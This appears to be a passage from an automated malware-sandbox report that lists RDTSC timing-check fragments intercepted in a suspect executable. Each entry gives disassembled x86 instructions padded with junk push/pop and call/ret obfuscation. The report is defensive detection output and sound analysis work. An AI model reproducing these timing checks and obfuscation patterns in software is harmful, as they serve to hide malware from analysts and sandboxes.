                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C66100 second address: C66165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F0550733D06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov esi, edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F0550733D08h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f sub dword ptr [ebp+1245BF8Eh], ecx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ecx 0x0000003a call 00007F0550733D08h 0x0000003f pop ecx 0x00000040 mov dword ptr [esp+04h], ecx 0x00000044 add dword ptr [esp+04h], 0000001Bh 0x0000004c inc ecx 0x0000004d push ecx 0x0000004e ret 0x0000004f pop ecx 0x00000050 ret 0x00000051 mov si, di 0x00000054 xchg eax, ebx 0x00000055 push ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C66165 second address: C66169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C66BD0 second address: C66BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C676BF second address: C676C4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C69136 second address: C69150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F0550733D06h 0x0000000b jng 00007F0550733D06h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C69150 second address: C69175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F0550D663D7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6972B second address: C6976F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D2A86h], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F0550733D08h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D3A85h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6976F second address: C69775 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C69775 second address: C6977A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6977A second address: C69780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6A24C second address: C6A251 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6A251 second address: C6A262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0550D663C6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6E8A1 second address: C6E906 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+122D39A9h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F0550733D08h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jp 00007F0550733D0Ch 0x00000035 sub dword ptr [ebp+122D2C9Fh], edx 0x0000003b mov edi, esi 0x0000003d push 00000000h 0x0000003f clc 0x00000040 push eax 0x00000041 jbe 00007F0550733D10h 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6F969 second address: C6F96E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6F96E second address: C6F9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F0550733D08h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F0550733D08h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D1CDAh] 0x00000048 sbb bl, FFFFFFB3h 0x0000004b xchg eax, esi 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6F9D6 second address: C6F9DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6F9DC second address: C6F9E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6F9E2 second address: C6F9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C70B71 second address: C70C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F0550733D08h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 call 00007F0550733D18h 0x0000002b jmp 00007F0550733D10h 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 movzx ebx, dx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F0550733D08h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000018h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 jmp 00007F0550733D14h 0x0000005b push edx 0x0000005c pop edx 0x0000005d popad 0x0000005e rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C71B5E second address: C71B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73BDE second address: C73BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73BE4 second address: C73BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73BEB second address: C73C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3931h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F0550733D08h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D26ABh], ecx 0x00000032 mov ebx, dword ptr [ebp+122D392Dh] 0x00000038 push 00000000h 0x0000003a clc 0x0000003b push eax 0x0000003c push edi 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73C37 second address: C73C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C75AFD second address: C75B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550733D0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F0550733D08h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 jng 00007F0550733D07h 0x0000002a cld 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 call 00007F0550733D08h 0x00000035 pop ebx 0x00000036 mov dword ptr [esp+04h], ebx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebx 0x00000043 push ebx 0x00000044 ret 0x00000045 pop ebx 0x00000046 ret 0x00000047 mov dword ptr [ebp+122D2681h], edi 0x0000004d push 00000000h 0x0000004f mov ebx, dword ptr [ebp+122D1EB1h] 0x00000055 xchg eax, esi 0x00000056 pushad 0x00000057 jo 00007F0550733D1Bh 0x0000005d jmp 00007F0550733D15h 0x00000062 pushad 0x00000063 jnc 00007F0550733D06h 0x00000069 jl 00007F0550733D06h 0x0000006f popad 0x00000070 popad 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 ja 00007F0550733D06h 0x0000007c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C75B97 second address: C75B9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C75B9D second address: C75BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550733D12h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C77BD1 second address: C77BE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007F0550D663CEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C6EA3E second address: C6EABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 nop 0x00000007 jmp 00007F0550733D15h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F0550733D08h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d call 00007F0550733D0Bh 0x00000032 mov ebx, esi 0x00000034 pop ebx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c mov ebx, dword ptr [ebp+122D3A75h] 0x00000042 mov eax, dword ptr [ebp+122D017Dh] 0x00000048 mov dword ptr [ebp+122D22ECh], eax 0x0000004e push FFFFFFFFh 0x00000050 mov ebx, dword ptr [ebp+122D3751h] 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jng 00007F0550733D06h 0x00000060 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C70D8C second address: C70D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C72D92 second address: C72D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73D1D second address: C73D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0550D663D2h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C74D22 second address: C74D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C75CC8 second address: C75CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C72D98 second address: C72DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0550733D0Ch 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73D33 second address: C73DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0550D663D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007F0550D663E7h 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D2C95h], eax 0x00000019 push dword ptr fs:[00000000h] 0x00000020 jp 00007F0550D663CCh 0x00000026 mov ebx, dword ptr [ebp+122D1E71h] 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov ebx, dword ptr [ebp+122D2E99h] 0x00000039 mov eax, dword ptr [ebp+122D0105h] 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007F0550D663C8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 mov ebx, 4E2D9D37h 0x0000005e push FFFFFFFFh 0x00000060 push 00000000h 0x00000062 push esi 0x00000063 call 00007F0550D663C8h 0x00000068 pop esi 0x00000069 mov dword ptr [esp+04h], esi 0x0000006d add dword ptr [esp+04h], 00000019h 0x00000075 inc esi 0x00000076 push esi 0x00000077 ret 0x00000078 pop esi 0x00000079 ret 0x0000007a mov ebx, dword ptr [ebp+122D3905h] 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jno 00007F0550D663CCh 0x00000089 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C74D27 second address: C74DA4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0550733D08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F0550733D0Fh 0x00000014 mov dword ptr [ebp+1246642Ch], eax 0x0000001a pop ebx 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jmp 00007F0550733D0Ah 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e stc 0x0000002f mov eax, dword ptr [ebp+122D14F5h] 0x00000035 mov bx, A61Ch 0x00000039 push FFFFFFFFh 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F0550733D08h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 mov ebx, dword ptr [ebp+122D2B53h] 0x0000005b sub edi, 31AFC3F3h 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 push edi 0x00000066 pop edi 0x00000067 pushad 0x00000068 popad 0x00000069 popad 0x0000006a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C72DB0 second address: C72DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73DFF second address: C73E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C74DA4 second address: C74DCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0550D663C6h 0x00000009 jmp 00007F0550D663D0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 jng 00007F0550D663C6h 0x0000001b pop edi 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C73E05 second address: C73E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C74DCB second address: C74DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C79D72 second address: C79D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7ADBA second address: C7ADC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7ADC4 second address: C7ADD6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0550733D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7ADD6 second address: C7ADDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7ADDA second address: C7AE30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F0550733D14h 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 xor dword ptr [ebp+1247CF85h], esi 0x0000001c movzx ebx, bx 0x0000001f push 00000000h 0x00000021 xor dword ptr [ebp+122D2AACh], edi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F0550733D15h 0x00000030 js 00007F0550733D06h 0x00000036 popad 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7AE30 second address: C7AE36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7BF2C second address: C7BFAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F0550733D06h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F0550733D08h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jl 00007F0550733D0Ch 0x00000031 and edi, dword ptr [ebp+122D2F2Bh] 0x00000037 clc 0x00000038 mov di, dx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007F0550733D08h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 add dword ptr [ebp+122D2ED1h], ecx 0x0000005d push 00000000h 0x0000005f sub dword ptr [ebp+122D26ABh], ecx 0x00000065 xchg eax, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007F0550733D0Fh 0x0000006f rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7BFAD second address: C7BFB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7BFB3 second address: C7BFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7BFB9 second address: C7BFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7DE56 second address: C7DE5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7DE5A second address: C7DEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0550D663C8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D2C12h], edi 0x0000002a push 00000000h 0x0000002c movzx edi, di 0x0000002f push 00000000h 0x00000031 mov dword ptr [ebp+124527CFh], ebx 0x00000037 jbe 00007F0550D663D3h 0x0000003d pushad 0x0000003e xor bx, 9B15h 0x00000043 mov dword ptr [ebp+122D2DE4h], ecx 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 jns 00007F0550D663C6h 0x00000056 popad 0x00000057 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7DEB4 second address: C7DEB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7DEB9 second address: C7DEBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7B005 second address: C7B00B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7B00B second address: C7B015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0550D663C6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C7C0FB second address: C7C101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C88BFA second address: C88C17 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0550D663C6h 0x00000008 jmp 00007F0550D663CDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C88C17 second address: C88C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0550733D14h 0x00000009 pop esi 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F0550733D0Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C88C42 second address: C88C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\13s1HMkHKv.exeRDTSC instruction interceptor: First address: C88C48 second address: C88C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
